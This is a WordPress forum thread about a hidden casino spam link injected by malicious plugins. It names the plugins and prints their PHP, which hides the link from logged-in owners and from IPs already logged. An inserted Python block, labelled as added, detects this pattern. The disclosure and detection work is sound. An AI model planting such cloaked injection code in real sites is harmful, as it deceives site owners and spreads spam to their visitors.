
My Site deface link integrated on my homepage (7 posts)

  1. wandisyahid
    Member
    Posted 8 months ago #

    On my website there is a link |<p align="right">http://bet.sitonline.it</p>| I do not know the location of the link, please help :(

  2. WPyogi
    Volunteer Moderator
    Posted 8 months ago #

  3. Krishna
    Volunteer Moderator
    Posted 8 months ago #

    You can find that link on several other sites if you make a Google search for it. It looks like an intrusion/hack into your site, though security check tools do not show that. Review: http://codex.wordpress.org/Hardening_WordPress

    Edit: Follow WPyogi's advice above.

  4. wandisyahid
    Member
    Posted 8 months ago #

    Hello,

    Ok thanks all,

    Problem resolved: I replaced all files in wp-admin and wp-includes, except wp-config.php and wp-content, and it is back to normal.

    Thank you so much.

  5. maggot399
    Member
    Posted 7 months ago #

    Actually no one hacked into your site the way you might think - the spam links are created by a malicious WordPress plugin you downloaded directly from wordpress.org. The spammer just keeps creating new plugins after they get banned. Definitely a flaw in the way WordPress offers plugins to users...

    The following plugins are known to be linked to the spammer:

    seo-cheese
    return-to-top
    g-translate (note the hyphen - other versions are fine)
    seo-interlinking
    google-maps-by-daniel-martyn

    If you have installed any of these plugins they should be removed immediately as they are all produced by the same hacker. They all insert dodgy links into the top of your site.

    Malicious code (this is normally found in setup.php or install.php)

    <?php
    // Only visitors who are NOT logged in ever get the link.
    if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
    if ($loggedin == 'no') {
        // created.txt holds previously recorded visitor IPs; if the current
        // IP already appears in it, the link is suppressed for that visitor.
        $ip = $_SERVER['REMOTE_ADDR'];
        $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
        $handle = fopen($filename, "r");
        $contents = fread($handle, filesize($filename));
        fclose($handle);
        $filestring = $contents;
        $findme = $ip;
        $pos = strpos($filestring, $findme);
        if ($pos === false) {
            // IP not on record: emit the hidden spam link.
    ?>
    <p align="center"><a href="http://online-casino.blog.ca">http://online-casino.blog.ca</a></p>
    <?php //
        } else {
            // IP already recorded: output nothing.
            echo '';
        }
    }
    ?>

    The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.

    [ Thanks but please do not post spammy links like that on these forums ]

    The trick works well because the link itself is not visible to the site owner as firstly, it doesn't show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link to any recorded IP addresses.
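The cloaking logic described in the post above lends itself to two offline checks, which the following Python demonstrates. This is an added example, not code from the thread or from WordPress: the PHP plugin sources, the two HTML page captures and the site hostname `example.com` are constructed for illustration. The first function scans a plugin's PHP for the three ingredients of the cloak (an is_user_logged_in() gate, a $_SERVER['REMOTE_ADDR'] lookup, and an off-site anchor); the second compares the page as an anonymous visitor sees it against the page as the logged-in owner sees it and reports outbound links that only the anonymous view contains.

```python
"""Added example (not from the forum thread): offline checks for the
login/IP-cloaked spam link pattern. All sample inputs are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators of the cloak as posted in the thread.
GATE_RE = re.compile(r"is_user_logged_in\s*\(")
IP_RE = re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]")
IP_LOG_RE = re.compile(r"(fopen|file_get_contents|file_put_contents)\s*\(")
HREF_RE = re.compile(r"<a\s[^>]*href\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)


def scan_plugin_source(php: str, site_host: str) -> dict:
    """Return the indicators found in one PHP source text.

    An off-site link on its own (an author's credit link) is not flagged;
    the gate, the REMOTE_ADDR lookup and an off-site link together are."""
    external = [u for u in HREF_RE.findall(php)
                if urlparse(u).hostname not in (None, site_host)]
    found = {
        "login_gate": bool(GATE_RE.search(php)),
        "reads_remote_addr": bool(IP_RE.search(php)),
        "ip_log_file": bool(IP_LOG_RE.search(php)),
        "external_links": external,
    }
    found["suspicious"] = (found["login_gate"] and found["reads_remote_addr"]
                           and bool(external))
    return found


class _LinkCollector(HTMLParser):
    """Collects every href from <a> tags in an HTML document."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for key, value in attrs:
                if key == "href" and value:
                    self.links.append(value)


def outbound_links(html: str, site_host: str) -> set:
    """Absolute links whose host is not the site's own host."""
    parser = _LinkCollector()
    parser.feed(html)
    return {u for u in parser.links if urlparse(u).hostname not in (None, site_host)}


def links_hidden_from_owner(anonymous_html: str, logged_in_html: str, site_host: str) -> set:
    """Outbound links an anonymous visitor sees but the logged-in owner does not.

    Fetch the anonymous copy from a network you have never logged in from:
    the plugin also suppresses the link for IPs it has already recorded."""
    return outbound_links(anonymous_html, site_host) - outbound_links(logged_in_html, site_host)


SITE_HOST = "example.com"  # assumed hostname of the site being checked

# Constructed sample: the cloaking pattern with a placeholder spam domain.
CLOAKED_PLUGIN = r"""<?php
if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
if ($loggedin == 'no') {
    $ip = $_SERVER['REMOTE_ADDR'];
    $filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/x/created.txt';
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    if (strpos($contents, $ip) === false) {
?>
<p align="center"><a href="http://spam.invalid/">http://spam.invalid/</a></p>
<?php } }
?>"""

# Constructed sample: a harmless plugin that only links to the site itself.
BENIGN_PLUGIN = r"""<?php
function example_footer() { echo '<a href="https://example.com/about">About</a>'; }
add_action('wp_footer', 'example_footer');"""

# Constructed page captures: anonymous visitor vs. logged-in owner.
ANON_HTML = ('<html><body><p align="center"><a href="http://spam.invalid/">'
             'http://spam.invalid/</a></p><a href="/about">About</a>'
             '<a href="https://example.com/posts">Posts</a></body></html>')
OWNER_HTML = ('<html><body><a href="/about">About</a>'
              '<a href="https://example.com/posts">Posts</a></body></html>')

if __name__ == "__main__":
    print("cloaked plugin:", scan_plugin_source(CLOAKED_PLUGIN, SITE_HOST))
    print("benign plugin:", scan_plugin_source(BENIGN_PLUGIN, SITE_HOST))
    print("hidden from owner:", links_hidden_from_owner(ANON_HTML, OWNER_HTML, SITE_HOST))
```

To use the scanner on a real install, read each file under wp-content/plugins and pass its text to scan_plugin_source; any file with "suspicious" set deserves a manual read of the surrounding code rather than automatic deletion, since the regexes only match the shape of the trick, not the spammer's exact domain.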

  6. The spammer just keeps creating new plugins after they get banned. Definitely a flaw in the way WordPress offers plugins to users...

    It's the best 100% volunteer-staffed system available. Sometimes that happens, and when it's properly reported it gets dealt with quickly.

    For example this one was discovered and dealt with.

    google-maps-by-daniel-martyn

    I haven't validated your other listed plugins, but if you have specific information about those plugins please send the details to plugins [at] wordpress.org and those plugins will get looked at.

  7. maggot399
    Member
    Posted 7 months ago #

    Actually all the others on the list have already been dealt with, so I see WordPress does have a lot of moderators here that seem to do a great job in protecting other WordPress users.

    The issue is, however, that there's no doubt other plugins live right now, created by the same spammer, that we don't know about. When they create a new plugin it 'survives' for a few weeks without being detected, which is enough for a good few hundred sites to get infected. Once you install one of the dodgy plugins created by this spammer it's hard to even notice you have a problem, because of the way it deceptively hides the link from the site owner.

    Also many thousands of sites remain infected right now by the plugins I listed above, even though they were removed quite quickly.

    Is there any way for WordPress to email users that have installed a plugin after it gets removed for reasons like this? I take it once WordPress is installed on their own domain there's no connection between WordPress servers and the site owner?

    See these links for more information
    http://wordpress.org/support/topic/strange-link-to-casino-online-appeared-at-the-top-of-my-blog
    http://wordpress.org/support/topic/random-casino-link-has-appeared-on-my-wordpress-site

    To see just how widespread the problem is, just type one of the spammy domains into Google and see just how many thousands are displaying the link on their blog (a couple of them are in the links I provided above).

    Thanks
